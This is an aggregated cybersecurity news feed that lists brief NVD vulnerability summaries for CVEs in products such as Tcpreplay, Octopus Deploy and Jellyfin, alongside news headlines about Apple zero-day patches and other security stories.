‼ CVE-2022-37048 ‼
📖 Read
via "National Vulnerability Database".
The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-29507 ‼
📖 Read
via "National Vulnerability Database".
Insufficiently protected credentials in the Intel(R) Team Blue mobile application in all versions may allow an authenticated user to potentially enable information disclosure via local access.📖 Read
via "National Vulnerability Database".
⚠ Apple patches double zero-day in browser and kernel – update now! ⚠
📖 Read
via "Naked Security".
Double 0-day exploits - one in WebKit (to break in) and the other in the kernel (to take over). Patch now!📖 Read
via "Naked Security".
Sophos News
Naked Security – Sophos News
⚠ S3 Ep96: Zoom 0-day, AEPIC leak, Conti reward, healthcare security [Audio + Text] ⚠
📖 Read
via "Naked Security".
Latest episode - listen now (or read if you prefer!)📖 Read
via "Naked Security".
Naked Security
S3 Ep96: Zoom 0-day, AEPIC leak, Conti reward, healthcare security [Audio + Text]
Latest episode – listen now (or read if you prefer!)
‼ CVE-2022-35540 ‼
📖 Read
via "National Vulnerability Database".
Hardcoded JWT Secret in AgileConfig <1.6.8 Server allows remote attackers to use the generated JWT token to gain administrator access.📖 Read
via "National Vulnerability Database".
‼ CVE-2020-36599 ‼
📖 Read
via "National Vulnerability Database".
lib/omniauth/failure_endpoint.rb in OmniAuth before 2.0 does not escape the message_key value.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1901 ‼
📖 Read
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to unmask sensitive variables by using variable preview.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-2074 ‼
📖 Read
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service using the Variable Project Template.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-2049 ‼
📖 Read
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service via the package upload function.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-2075 ‼
📖 Read
via "National Vulnerability Database".
In affected versions of Octopus Deploy it is possible to perform a Regex Denial of Service targeting the build information request validation.📖 Read
via "National Vulnerability Database".
🗓️ API security: Broken access controls, injection attacks plague the enterprise security landscape in 2022 🗓️
📖 Read
via "The Daily Swig".
Spring4Shell and Veeam RCE exploit topped the list in Q1 2022📖 Read
via "The Daily Swig".
The Daily Swig | Cybersecurity news and views
API security: Broken access controls, injection attacks plague the enterprise security landscape in 2022
Spring4Shell and Veeam RCE exploit topped the list in Q1 2022
🔏 Friday Five 8/19 🔏
📖 Read
via "".
Security issues in Apple devices and one of the largest DDoS attacks on record dominated the headlines this week. Read about these stories and more all in this week's Friday Five!
📖 Read
via "".
‼ CVE-2022-2886 ‼
📖 Read
via "National Vulnerability Database".
A vulnerability, which was classified as critical, was found in Laravel 5.1. Affected is an unknown function. The manipulation leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-206688.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-35910 ‼
📖 Read
via "National Vulnerability Database".
In Jellyfin before 10.8, stored XSS allows theft of an admin access token.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-35909 ‼
📖 Read
via "National Vulnerability Database".
In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-2889 ‼
📖 Read
via "National Vulnerability Database".
Use After Free in GitHub repository vim/vim prior to 9.0.0224.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-36220 ‼
📖 Read
via "National Vulnerability Database".
Kiosk breakout (without quit password) in Safe Exam Browser (Windows) <3.4.0, which allows an attacker to achieve code execution via the browsers' print dialog.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-1021 ‼
📖 Read
via "National Vulnerability Database".
Insecure Storage of Sensitive Information in GitHub repository chatwoot/chatwoot prior to 2.6.0.📖 Read
via "National Vulnerability Database".
‼ CVE-2022-29805 ‼
📖 Read
via "National Vulnerability Database".
A Java Deserialization vulnerability in the Fishbowl Server in Fishbowl Inventory before 2022.4.1 allows remote attackers to execute arbitrary code via a crafted XML payload.📖 Read
via "National Vulnerability Database".
🕴 Cyber Resiliency Isn't Just About Technology, It's About People 🕴
📖 Read
via "Dark Reading".
To lessen burnout and prioritize staff resiliency, put people in a position to succeed with staffwide cybersecurity training to help ease the burden on IT and security personnel.📖 Read
via "Dark Reading".
Dark Reading
Cyber Resiliency Isn't Just About Technology, It's About People
To lessen burnout and prioritize staff resiliency, put people in a position to succeed with staffwide cybersecurity training to help ease the burden on IT and security personnel.
❌ iPhone Users Urged to Update to Patch 2 Zero-Days ❌
📖 Read
via "Threat Post".
Apple is urging macOS, iPhone and iPad users immediately to install respective updates this week that includes fixes for two zero-days under active attack. The patches are for vulnerabilities that allow attackers to execute arbitrary code and ultimately take over devices. iOS 15.6.1 and macOS Monterey 12.5.1 both patch the two flaws, which basically impact […]📖 Read
via "Threat Post".
Threat Post
iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.